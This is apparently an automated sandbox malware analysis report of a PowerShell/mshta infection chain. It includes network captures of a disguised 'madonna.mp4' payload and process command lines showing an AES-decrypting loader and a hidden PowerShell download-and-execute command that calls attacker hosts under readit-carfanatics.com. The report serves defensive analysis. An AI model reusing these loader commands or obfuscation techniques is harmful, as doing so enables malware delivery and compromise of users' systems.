                                              Dec 24, 2024 15:31:05.406656981 CET1.1.1.1192.168.2.40x4d19No error (0)pawpaws1.readit-carfanatics.com104.21.52.169A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • pawpaws.readit-carfanatics.com
                                              • pawpaws1.readit-carfanatics.com

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449730172.67.201.1434437560C:\Windows\System32\mshta.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-24 14:31:00 UTC345OUTGET /madonna.mp4 HTTP/1.1
                                              Accept: */*
                                              Accept-Language: en-CH
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                              Host: pawpaws.readit-carfanatics.com
                                              Connection: Keep-Alive
                                              2024-12-24 14:31:01 UTC927INHTTP/1.1 200 OK
                                              Date: Tue, 24 Dec 2024 14:31:00 GMT
                                              Content-Type: video/mp4
                                              Content-Length: 537096
                                              Connection: close
                                              Accept-Ranges: bytes
                                              ETag: "ce7aa8e9e4e4b562ff54d31f64a65b56"
                                              Last-Modified: Fri, 20 Dec 2024 19:37:26 GMT
                                              Vary: Accept-Encoding
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1kIGOFckomtnYzghHjPsSS9AP0vvoRIweK%2ByVTFSFzy7eJoXurrZHFa2e2Xxv%2FDOLVXSwhfKZ8dEL0B%2FlEQwjFQoO%2Bh4dQCq37P%2BBi8Hb0Uz1Xkp6XII8DTmDCRZfFC%2BGZYqtfXnD8cCmKQIBAR54yg%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8f714ae5bb8472aa-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=2040&min_rtt=2038&rtt_var=770&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2880&recv_bytes=927&delivery_rate=1416787&cwnd=191&unsent_bytes=0&cid=cda0259d75d11e07&ts=616&x=0"
                                              2024-12-24 14:31:01 UTC442INData Raw: 36 36 76 37 35 63 36 65 54 36 33 47 37 34 48 36 39 54 36 66 6a 36 65 50 32 30 4c 36 61 58 37 38 6b 37 39 58 35 31 76 36 61 4c 37 34 5a 32 38 45 36 38 4f 36 38 45 35 36 63 35 37 76 35 33 77 32 39 52 37 62 45 37 36 75 36 31 56 37 32 42 32 30 65 36 37 67 36 31 51 36 36 6a 35 31 71 36 61 42 37 31 50 33 64 4f 32 30 6b 32 37 78 32 37 4c 33 62 4a 36 36 62 36 66 57 37 32 6d 32 30 73 32 38 4f 37 36 69 36 31 76 37 32 4b 32 30 6c 35 37 4b 34 39 77 36 31 4e 34 37 7a 36 36 44 32 30 6c 33 64 59 32 30 69 33 30 64 33 62 59 35 37 5a 34 39 6c 36 31 47 34 37 70 36 36 44 32 30 79 33 63 62 32 30 68 36 38 69 36 38 48 35 36 68 35 37 62 35 33 62 32 65 73 36 63 45 36 35 64 36 65 47 36 37 4a 37 34 45 36 38 44 33 62 56 32 30 7a 35 37 4b 34 39 50 36 31 55 34 37 6a 36 36 44 32 62 6b
                                              Data Ascii: 66v75c6eT63G74H69T6fj6eP20L6aX78k79X51v6aL74Z28E68O68E56c57v53w29R7bE76u61V72B20e67g61Q66j51q6aB71P3dO20k27x27L3bJ66b6fW72m20s28O76i61v72K20l57K49w61N47z66D20l3dY20i30d3bY57Z49l61G47p66D20y3cb20h68i68H56h57b53b2es6cE65d6eG67J74E68D3bV20z57K49P61U47j66D2bk
                                              2024-12-24 14:31:01 UTC1369INData Raw: 64 78 32 30 64 36 37 4d 36 31 4f 36 36 78 35 31 76 36 61 48 37 31 75 32 30 6e 32 62 44 32 30 4f 34 66 54 34 38 4f 34 66 50 35 35 52 36 35 47 37 64 6e 37 32 54 36 35 4b 37 34 6a 37 35 6e 37 32 54 36 65 67 32 30 6a 36 37 47 36 31 4e 36 36 43 35 31 68 36 61 68 37 31 6e 37 64 79 33 62 6e 37 36 66 36 31 75 37 32 68 32 30 66 36 37 4d 36 31 4d 36 36 4e 35 31 54 36 61 4d 37 31 73 32 30 54 33 64 48 32 30 57 36 61 75 37 38 54 37 39 59 35 31 75 36 61 64 37 34 6f 32 38 6a 35 62 56 33 39 6e 33 39 59 33 33 65 32 63 77 33 39 63 33 39 49 33 32 6a 32 63 74 33 31 61 33 30 4d 33 30 7a 33 30 46 32 63 61 33 39 6f 33 38 55 33 32 69 32 63 6d 33 39 75 33 39 61 33 35 47 32 63 71 33 39 58 33 39 76 33 36 41 32 63 5a 33 39 4d 33 38 4c 33 35 75 32 63 64 33 39 6d 33 38 44 33 32 79 32
                                              Data Ascii: dx20d67M61O66x51v6aH71u20n2bD20O4fT48O4fP55R65G7dn72T65K74j75n72T6eg20j67G61N66C51h6ah71n7dy3bn76f61u72h20f67M61M66N51T6aM71s20T3dH20W6au78T79Y51u6ad74o28j5bV39n39Y33e2cw39c39I32j2ct31a30M30z30F2ca39o38U32i2cm39u39a35G2cq39X39v36A2cZ39M38L35u2cd39m38D32y2
                                              2024-12-24 14:31:01 UTC1369INData Raw: 61 32 63 58 33 39 7a 33 32 6a 33 30 5a 32 63 6b 33 39 78 33 32 45 33 39 4e 32 63 4e 33 31 58 33 30 54 33 30 54 33 31 54 32 63 75 33 39 44 33 31 64 33 37 4f 32 63 53 33 39 67 33 31 68 33 39 50 32 63 4e 33 39 71 33 31 4a 33 33 75 32 63 63 33 39 6c 33 32 67 33 30 64 32 63 54 33 39 42 33 32 7a 33 32 50 32 63 75 33 31 79 33 30 42 33 30 63 33 36 64 32 63 73 33 39 56 33 34 48 33 30 5a 32 63 52 33 39 47 33 31 47 33 37 75 32 63 5a 33 39 50 33 37 58 33 31 4e 32 63 6d 33 39 59 33 35 6d 33 36 71 32 63 4c 33 39 4b 33 35 49 33 34 5a 32 63 66 33 39 48 33 35 4d 33 33 59 32 63 6a 33 39 75 33 38 56 33 37 55 32 63 44 33 39 5a 33 31 76 33 33 43 32 63 41 33 39 6b 33 34 61 33 32 4b 32 63 5a 33 39 70 33 31 76 33 33 6b 32 63 43 33 39 7a 33 39 43 33 34 57 32 63 49 33 39 51 33 39
                                              Data Ascii: a2cX39z32j30Z2ck39x32E39N2cN31X30T30T31T2cu39D31d37O2cS39g31h39P2cN39q31J33u2cc39l32g30d2cT39B32z32P2cu31y30B30c36d2cs39V34H30Z2cR39G31G37u2cZ39P37X31N2cm39Y35m36q2cL39K35I34Z2cf39H35M33Y2cj39u38V37U2cD39Z31v33C2cA39k34a32K2cZ39p31v33k2cC39z39C34W2cI39Q39
                                              2024-12-24 14:31:01 UTC1369INData Raw: 33 39 51 33 32 51 33 39 7a 32 63 55 33 39 68 33 33 73 33 35 7a 32 63 48 33 39 65 33 34 77 33 36 70 32 63 71 33 39 75 33 33 65 33 36 65 32 63 65 33 39 66 33 33 55 33 35 4d 32 63 59 33 39 48 33 33 74 33 32 63 32 63 53 33 39 74 33 33 50 33 32 55 32 63 42 33 39 52 33 33 61 33 32 57 32 63 76 33 39 63 33 33 6b 33 36 68 32 63 56 33 39 47 33 34 43 33 37 6b 32 63 4a 33 39 77 33 34 58 33 39 7a 32 63 5a 33 39 41 33 33 68 33 32 70 32 63 74 33 39 67 33 33 77 33 32 52 32 63 58 33 39 48 33 33 4f 33 33 6c 32 63 57 33 39 6e 33 32 67 33 39 62 32 63 53 33 39 58 33 35 79 33 31 70 32 63 45 33 39 61 33 35 75 33 31 4e 32 63 4a 33 39 77 33 33 49 33 37 58 32 63 64 33 39 6a 33 32 43 33 39 62 32 63 6b 33 39 75 33 34 43 33 37 52 32 63 4c 33 39 5a 33 32 62 33 39 55 32 63 55 33 39 49
                                              Data Ascii: 39Q32Q39z2cU39h33s35z2cH39e34w36p2cq39u33e36e2ce39f33U35M2cY39H33t32c2cS39t33P32U2cB39R33a32W2cv39c33k36h2cV39G34C37k2cJ39w34X39z2cZ39A33h32p2ct39g33w32R2cX39H33O33l2cW39n32g39b2cS39X35y31p2cE39a35u31N2cJ39w33I37X2cd39j32C39b2ck39u34C37R2cL39Z32b39U2cU39I
                                              2024-12-24 14:31:01 UTC1369INData Raw: 39 4c 33 33 72 33 31 73 32 63 64 33 39 6a 33 32 66 33 39 50 32 63 55 33 39 6a 33 33 66 33 38 78 32 63 71 33 39 78 33 34 63 33 37 78 32 63 49 33 39 63 33 32 68 33 39 47 32 63 6a 33 39 5a 33 34 57 33 39 4c 32 63 65 33 39 53 33 32 52 33 39 43 32 63 62 33 39 49 33 33 75 33 33 76 32 63 4e 33 39 68 33 33 5a 33 30 64 32 63 6f 33 39 51 33 33 4f 33 30 74 32 63 52 33 39 43 33 33 4c 33 31 6c 32 63 44 33 39 6c 33 33 66 33 33 46 32 63 50 33 39 77 33 33 54 33 33 56 32 63 46 33 39 48 33 33 57 33 31 67 32 63 6f 33 39 67 33 33 4f 33 37 4b 32 63 52 33 39 64 33 33 6f 33 33 4d 32 63 70 33 39 6a 33 35 6b 33 31 4a 32 63 58 33 39 79 33 33 49 33 36 73 32 63 4f 33 39 6f 33 34 6f 33 37 67 32 63 4f 33 39 6c 33 33 49 33 37 73 32 63 6d 33 39 4c 33 33 6d 33 37 65 32 63 70 33 39 5a 33
                                              Data Ascii: 9L33r31s2cd39j32f39P2cU39j33f38x2cq39x34c37x2cI39c32h39G2cj39Z34W39L2ce39S32R39C2cb39I33u33v2cN39h33Z30d2co39Q33O30t2cR39C33L31l2cD39l33f33F2cP39w33T33V2cF39H33W31g2co39g33O37K2cR39d33o33M2cp39j35k31J2cX39y33I36s2cO39o34o37g2cO39l33I37s2cm39L33m37e2cp39Z3
                                              2024-12-24 14:31:01 UTC1369INData Raw: 6e 33 34 52 33 37 6e 32 63 6e 33 39 4a 33 34 6d 33 36 66 32 63 4f 33 39 52 33 33 6b 33 33 48 32 63 59 33 39 78 33 34 6a 33 36 79 32 63 79 33 39 4b 33 34 50 33 37 70 32 63 44 33 39 48 33 34 43 33 37 78 32 63 51 33 39 7a 33 33 52 33 33 5a 32 63 56 33 39 63 33 33 43 33 33 44 32 63 43 33 39 6b 33 34 6d 33 38 75 32 63 5a 33 39 73 33 34 6b 33 36 47 32 63 58 33 39 65 33 34 6c 33 38 5a 32 63 70 33 39 6d 33 34 75 33 37 71 32 63 77 33 39 77 33 33 41 33 32 47 32 63 75 33 39 65 33 33 65 33 34 64 32 63 6c 33 39 54 33 33 57 33 36 6f 32 63 73 33 39 4d 33 33 4a 33 33 6d 32 63 4f 33 39 68 33 34 46 33 36 6e 32 63 4b 33 39 6f 33 33 59 33 35 46 32 63 5a 33 39 49 33 32 52 33 39 59 32 63 57 33 39 64 33 33 49 33 35 65 32 63 45 33 39 61 33 32 64 33 39 5a 32 63 62 33 39 77 33 33
                                              Data Ascii: n34R37n2cn39J34m36f2cO39R33k33H2cY39x34j36y2cy39K34P37p2cD39H34C37x2cQ39z33R33Z2cV39c33C33D2cC39k34m38u2cZ39s34k36G2cX39e34l38Z2cp39m34u37q2cw39w33A32G2cu39e33e34d2cl39T33W36o2cs39M33J33m2cO39h34F36n2cK39o33Y35F2cZ39I32R39Y2cW39d33I35e2cE39a32d39Z2cb39w33
                                              2024-12-24 14:31:01 UTC1369INData Raw: 33 33 74 33 30 59 32 63 48 33 39 6b 33 34 45 33 39 45 32 63 47 33 39 62 33 33 6c 33 38 69 32 63 43 33 39 6b 33 34 61 33 38 46 32 63 4f 33 39 43 33 33 41 33 34 76 32 63 44 33 39 6b 33 33 73 33 38 77 32 63 69 33 39 71 33 34 59 33 39 4b 32 63 6e 33 39 43 33 34 57 33 37 4f 32 63 64 33 39 64 33 33 4a 33 35 6e 32 63 64 33 39 72 33 35 5a 33 30 63 32 63 73 33 39 76 33 33 61 33 32 57 32 63 54 33 39 70 33 33 56 33 38 61 32 63 44 33 39 71 33 34 79 33 39 6d 32 63 43 33 39 63 33 33 53 33 33 59 32 63 66 33 39 78 33 35 70 33 31 52 32 63 4c 33 39 74 33 33 51 33 38 44 32 63 45 33 39 58 33 33 46 33 37 5a 32 63 61 33 39 6e 33 35 62 33 30 58 32 63 63 33 39 59 33 34 43 33 39 48 32 63 4b 33 39 57 33 33 64 33 31 74 32 63 55 33 39 79 33 34 47 33 39 77 32 63 45 33 39 6b 33 34 4c
                                              Data Ascii: 33t30Y2cH39k34E39E2cG39b33l38i2cC39k34a38F2cO39C33A34v2cD39k33s38w2ci39q34Y39K2cn39C34W37O2cd39d33J35n2cd39r35Z30c2cs39v33a32W2cT39p33V38a2cD39q34y39m2cC39c33S33Y2cf39x35p31R2cL39t33Q38D2cE39X33F37Z2ca39n35b30X2cc39Y34C39H2cK39W33d31t2cU39y34G39w2cE39k34L
                                              2024-12-24 14:31:01 UTC1369INData Raw: 32 4b 33 39 73 32 63 5a 33 39 69 33 33 67 33 30 4c 32 63 66 33 39 7a 33 33 68 33 36 4a 32 63 4c 33 39 64 33 33 70 33 31 5a 32 63 64 33 39 67 33 35 6f 33 31 64 32 63 74 33 39 70 33 35 69 33 31 75 32 63 4c 33 39 77 33 33 6e 33 31 62 32 63 6a 33 39 54 33 32 72 33 39 48 32 63 71 33 39 4d 33 34 41 33 38 7a 32 63 6c 33 39 6d 33 33 41 33 32 73 32 63 67 33 39 53 33 34 52 33 39 79 32 63 6c 33 39 64 33 33 6d 33 30 43 32 63 49 33 39 47 33 33 49 33 34 63 32 63 79 33 39 53 33 33 49 33 33 78 32 63 56 33 39 50 33 33 68 33 36 63 32 63 76 33 39 46 33 33 62 33 36 4d 32 63 49 33 39 5a 33 33 54 33 37 79 32 63 64 33 39 70 33 33 6e 33 31 71 32 63 66 33 39 76 33 35 77 33 30 62 32 63 58 33 39 6b 33 33 4a 33 32 68 32 63 4a 33 39 6b 33 34 53 33 39 63 32 63 4c 33 39 4f 33 34 4a 33
                                              Data Ascii: 2K39s2cZ39i33g30L2cf39z33h36J2cL39d33p31Z2cd39g35o31d2ct39p35i31u2cL39w33n31b2cj39T32r39H2cq39M34A38z2cl39m33A32s2cg39S34R39y2cl39d33m30C2cI39G33I34c2cy39S33I33x2cV39P33h36c2cv39F33b36M2cI39Z33T37y2cd39p33n31q2cf39v35w30b2cX39k33J32h2cJ39k34S39c2cL39O34J3
                                              2024-12-24 14:31:01 UTC1369INData Raw: 47 33 36 6a 32 63 52 33 39 43 33 34 64 33 38 78 32 63 73 33 39 65 33 33 6f 33 34 4a 32 63 42 33 39 61 33 34 50 33 38 72 32 63 74 33 39 49 33 35 43 33 31 56 32 63 75 33 39 58 33 34 50 33 39 75 32 63 46 33 39 64 33 34 4a 33 36 50 32 63 4b 33 39 4c 33 34 74 33 38 42 32 63 62 33 39 65 33 33 6d 33 33 6c 32 63 57 33 39 6d 33 33 6d 33 34 76 32 63 50 33 39 55 33 34 66 33 38 53 32 63 78 33 39 74 33 33 4b 33 34 53 32 63 54 33 39 4a 33 34 5a 33 36 63 32 63 6f 33 39 71 33 34 75 33 36 55 32 63 4f 33 39 4d 33 34 64 33 39 6e 32 63 74 33 39 4f 33 32 6e 33 39 68 32 63 6b 33 39 6e 33 33 69 33 34 57 32 63 6f 33 39 65 33 34 55 33 37 47 32 63 57 33 39 48 33 35 47 33 30 61 32 63 72 33 39 77 33 35 77 33 30 4d 32 63 53 33 39 71 33 33 77 33 38 41 32 63 6d 33 39 51 33 33 4d 33 30
                                              Data Ascii: G36j2cR39C34d38x2cs39e33o34J2cB39a34P38r2ct39I35C31V2cu39X34P39u2cF39d34J36P2cK39L34t38B2cb39e33m33l2cW39m33m34v2cP39U34f38S2cx39t33K34S2cT39J34Z36c2co39q34u36U2cO39M34d39n2ct39O32n39h2ck39n33i34W2co39e34U37G2cW39H35G30a2cr39w35w30M2cS39q33w38A2cm39Q33M30
                                              2024-12-24 14:31:01 UTC1369INData Raw: 33 36 48 32 63 63 33 39 75 33 33 53 33 30 41 32 63 53 33 39 61 33 33 62 33 37 6a 32 63 48 33 39 79 33 33 62 33 35 41 32 63 6f 33 39 51 33 33 72 33 34 46 32 63 4e 33 39 4a 33 34 6d 33 39 65 32 63 6f 33 39 73 33 34 69 33 36 62 32 63 6a 33 39 6e 33 33 79 33 37 6f 32 63 43 33 39 56 33 33 45 33 36 48 32 63 61 33 39 77 33 33 43 33 38 66 32 63 4c 33 39 52 33 33 72 33 37 79 32 63 4d 33 39 57 33 33 56 33 33 77 32 63 67 33 39 6b 33 33 67 33 31 56 32 63 56 33 39 46 33 34 59 33 39 4c 32 63 6b 33 39 6c 33 32 53 33 39 6a 32 63 4c 33 39 72 33 34 51 33 37 66 32 63 63 33 39 6e 33 33 67 33 34 6d 32 63 75 33 39 54 33 33 5a 33 33 73 32 63 4e 33 39 4d 33 34 75 33 38 76 32 63 53 33 39 6f 33 33 53 33 30 52 32 63 57 33 39 6d 33 34 76 33 39 79 32 63 48 33 39 63 33 34 53 33 37 78
                                              Data Ascii: 36H2cc39u33S30A2cS39a33b37j2cH39y33b35A2co39Q33r34F2cN39J34m39e2co39s34i36b2cj39n33y37o2cC39V33E36H2ca39w33C38f2cL39R33r37y2cM39W33V33w2cg39k33g31V2cV39F34Y39L2ck39l32S39j2cL39r34Q37f2cc39n33g34m2cu39T33Z33s2cN39M34u38v2cS39o33S30R2cW39m34v39y2cH39c34S37x


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449734172.67.201.1434437872C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-24 14:31:06 UTC93OUTGET /madonna.vstx HTTP/1.1
                                              Host: pawpaws1.readit-carfanatics.com
                                              Connection: Keep-Alive
                                              2024-12-24 14:31:07 UTC966INHTTP/1.1 521
                                              Date: Tue, 24 Dec 2024 14:31:07 GMT
                                              Content-Type: text/plain; charset=UTF-8
                                              Content-Length: 15
                                              Connection: close
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wwElZmXnWnnFaa87Xp1AyJs5uqqa5OzhK7hrbs26cBrVjQrXop7J%2FKXdqv1ggSQdmUjhL8e870Yuewa7SQ7DseFRHMK2ULmSiyGlhaKZGR6DdWBmS93x1HnPJSU4EuZAOBb8GD7tL48v9gsh0b0mIB%2FS"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              X-Frame-Options: SAMEORIGIN
                                              Referrer-Policy: same-origin
                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                              Server: cloudflare
                                              CF-RAY: 8f714b0c3fad4388-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1583&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2859&recv_bytes=707&delivery_rate=1779402&cwnd=221&unsent_bytes=0&cid=328a5d65f55d62b7&ts=568&x=0"
                                              2024-12-24 14:31:07 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                              Data Ascii: error code: 521


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:09:30:55
                                              Start date:24/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1"
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:1
                                              Start time:09:30:55
                                              Start date:24/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:09:30:57
                                              Start date:24/12/2024
                                              Path:C:\Windows\System32\mshta.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\mshta.exe" https://pawpaws.readit-carfanatics.com/madonna.mp4
                                              Imagebase:0x7ff7d4e10000
                                              File size:14'848 bytes
                                              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:09:31:00
                                              Start date:24/12/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:4
                                              Start time:09:31:01
                                              Start date:24/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd('943C2C5C46A72B5C4C8C5C1A51E4FDD0974703BCE4EDF56B369378DFB2ECC854E259560AB569239046F77EA06A763337BD3340FF80B07C3CFCE33778E61B44845B5324775EE6ECAD2D2F37DD4F8DC9D93A8ABA7267AA5EA340079FA2334C6403714460816209B0D0411244284F7B8814FD62C23E419A8D047CB9595A51FEA7A3BCA7328CC8FCAF14C3F8165E90E2486DFAD60C27534F2C51C86D7F420CBBA4ABB44CACB3574A60609ED4B1F8BBC087D26FFE66EEB68F5686820C155B78783E6E11CF5815FCD1E2F8CA8C49791C0C4DF291EA66A7712921D9C59DB6E39D4F98ED2DC1A8E7A9946079CA7BF16CE0B32D041BED47781FEB352BDF1FB6018763D773644268B71F2526F6A617A9272A9ACDB0172FF20C3D1547782E3DBE0EDEC2C049AEA1DCE8744256C6E8717D86E602BF21D022B7E481612FD0E5AD43DEF8AEFF4BB1BB463D861888792AC5CFDAC45C5AAD05BEE91DABCC7A8CE6DC0862F3E928BE382F093C9D84D38A85151EEABB858C33520B5AABA90DFF68EE69A74D113C6C05BC871865DA879842D0B54C1DB7F4958097D12CECC5F9E39C9F6EF9ADF065DDA2643775FF589BDDA148E4527B97DE7BA451AC1EE997B73B0A1625177692622E4719148456AC24DEEA746D100F63E2E62646F66B245D3EED88607AB4D8A6022FA2F645BBFA59344E4471CB907FA8E491AA033889DB9D942E3F5420FF522C4C2C6217479BAC41430765CC37214D382A23920123068E397CA5AE645C1D0119DB511F8B852EA48834469651D0EC476969F2449303E7019452064057CE45DC4E16896B015B29CB64430183AF5618B121490DEE43084DC3253BC82E49716867CB584156D7865E1FA9DA392090109DF6E9A6CEFCAB60BE063896FE271D5F7145798747455EBE31B24E9BAE3DDE94E125C3AAB0F1CC7DA5D7D2C49F75D3D71BE3450EDFB23086A4D618521B1EE6EA4F7759E9CFC131005524C9B65D1D3D9FCB4F3E8A222D8020E0829864F6709CEA97810C2185CB147F13C7495B150A44FE94EC3E805FBE21BAB82B15870CAE560AAE4D4D533E433ABF4E5A563B39F36B23B63195F3779B0F8E07AE51936D7659CF47354C6662908568295088267D164DBF8CD609767B8170DEFEE21B10CE5C7244C519247C7C2F9CE8D7FA4027320E443B37F498F4BCDE2E63A97AC0167DCBD9DF73193FA93B3A82859FC1C7C6A740DD7140682426D7269E3DDEB5AB9467EC828C2C24E5D9149A12D98DFF32D05203D7536888907C29CA12DFCFB29B179E5F80DF3C545318D33794FAE90BEC7C573D81530A72C3E1664C1FCD78FFE0CC509A78F2E435BEE0A9EE5E4C0F5F6825B6883A784655B387AC0A63D3779D94D06E0C3BFC63D493D83B351266304E3C6A7FE938DB9F5FFD576369C82CA0050C55C2E8E82286D9AC048EE0F6E20CF515B8D1A1268959B2D3E695204352487CF3533397B42917060A182262AA9F2EA0B93E6742C4A2C669E95CD728');$MIDMd=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length)); & $MIDMd.Substring(0,3) $MIDMd.Substring(129)
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:09:31:01
                                              Start date:24/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:09:31:03
                                              Start date:24/12/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}}
                                              Imagebase:0x50000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:09:31:03
                                              Start date:24/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Executed Functions

                                                Function 00007FFD9B7C33B5 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1686788617.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b7c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                • Instruction ID: 995c809a1818668ffa22beee52c015c350a696e0f72191c51961a08a26fb3fe4
                                                • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                • Instruction Fuzzy Hash: 7701A73020CB0C4FD748EF0CE051AB5B3E0FB85320F10066DE58AC36A1DA32E882CB41

                                                Executed Functions

                                                Function 000001C9A3932200 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000003.1777932681.000001C9A3932000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C9A3932000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_3_1c9a3932000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4fe8877f45f07e580984cde4812ab08e73c41dd0c5788fff79519b8e56018482
                                                • Instruction ID: 9a33fe773c3071641017694f6b65fecd7109b691d9b3741ca8eac66a25f6afaf
                                                • Opcode Fuzzy Hash: 4fe8877f45f07e580984cde4812ab08e73c41dd0c5788fff79519b8e56018482
                                                • Instruction Fuzzy Hash: E4110C7055EB844FF78A9538943D7B83AD1EF86351F0A00EFD092C71E2E898CC858351
                                                Function 000001C9A1DE0FC1 Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
